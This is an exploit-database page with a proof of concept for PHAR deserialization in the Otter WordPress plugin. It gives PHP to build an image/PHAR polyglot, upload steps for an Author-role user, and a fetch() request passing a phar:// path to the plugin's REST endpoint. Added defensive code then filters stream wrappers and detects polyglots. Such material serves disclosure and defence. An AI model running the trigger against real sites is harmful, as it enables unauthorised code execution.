## https://sploitus.com/exploit?id=WPEX-ID:93ACB4EE-1053-48E1-8B69-C09DC3B2F302
Note that the following proof of concept requires WordPress to be running on a PHP version earlier than 8.0.
1. Create a PHAR file by saving the following PHP code as `create_phar.php` and running `php --define phar.readonly=0 create_phar.php`:

```php
<?php
class Evil {}
// create new Phar
$phar = new Phar('poc.phar');
$phar->startBuffering();
$phar->addFromString('test.png', 'text');
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
$phar->setMetadata(new Evil());
$phar->stopBuffering();
```
2. As a user with the Author role, upload the `poc.phar.jpg` file and note its path on the server (e.g. `/wp-content/uploads/2023/04/poc.phar_.jpg`).
3. Create a simulated gadget on the server with the following code:

```php
class Evil {
    function __wakeup() {
        die('Arbitrary deserialization');
    }
}
```
4. Trigger the deserialization with the following code in the browser console (with the correct path to the `.phar` file on your server):

```javascript
fetch("/wp-json/otter/v1/dynamic?type=author&uid=1234&context=somecontext&fallback=phar://wp-content/uploads/2023/04/poc.phar_.jpg/test.txt")
```
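The checks below are an added example written for this page, not code from the advisory or from the Otter plugin. They show how a plugin could refuse a `fallback` value like the one in step 4 before it reaches any filesystem call, and how an upload handler could spot the image/PHAR polyglot built in step 1. The function names and the sample paths are assumptions constructed for the example.

```php
<?php
// Added example (not from the advisory or the Otter plugin): defensive checks
// against the phar:// deserialization path described above.

// Refuse any value that would switch file access to a PHP stream wrapper.
// A fallback image should be a plain path or an http(s) URL; everything
// else is rejected. Wrapper names are matched case-insensitively.
function is_safe_fallback_path(string $value): bool {
    // Strip leading whitespace and NUL bytes that could hide a scheme.
    $value = ltrim($value, " \t\r\n\0");
    if ($value === '' || strpos($value, "\0") !== false) {
        return false;
    }
    // "scheme://" at the start: only http and https are allowed.
    if (preg_match('#^([a-z][a-z0-9+.\-]*)://#i', $value, $m)) {
        return in_array(strtolower($m[1]), ['http', 'https'], true);
    }
    // Conservatively refuse "://" anywhere else as well.
    if (strpos($value, '://') !== false) {
        return false;
    }
    return true;
}

// Detect a PHAR archive disguised as an image: the stub built in step 1 is
// JPEG magic bytes followed by "<?php __HALT_COMPILER(); ?>". A genuine
// image never carries that token, so its presence is a reliable indicator.
function looks_like_phar(string $file_contents): bool {
    return stripos($file_contents, '__HALT_COMPILER') !== false;
}

// Constructed sample values for a quick self-check (hypothetical paths).
$samples = [
    'wp-content/uploads/2023/04/image.jpg'                     => true,
    'https://example.com/image.jpg'                            => true,
    'phar://wp-content/uploads/2023/04/poc.phar_.jpg/test.txt' => false,
];
foreach ($samples as $path => $expected) {
    assert(is_safe_fallback_path($path) === $expected);
}
// Constructed polyglot header, as produced by the PoC's setStub() call.
$fake_jpeg = "\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>";
assert(looks_like_phar($fake_jpeg) === true);
assert(looks_like_phar("\xff\xd8\xff\xe0JFIF") === false);
echo "checks passed\n";
```

Run with `php -d zend.assertions=1 checks.php` so the `assert()` calls are evaluated.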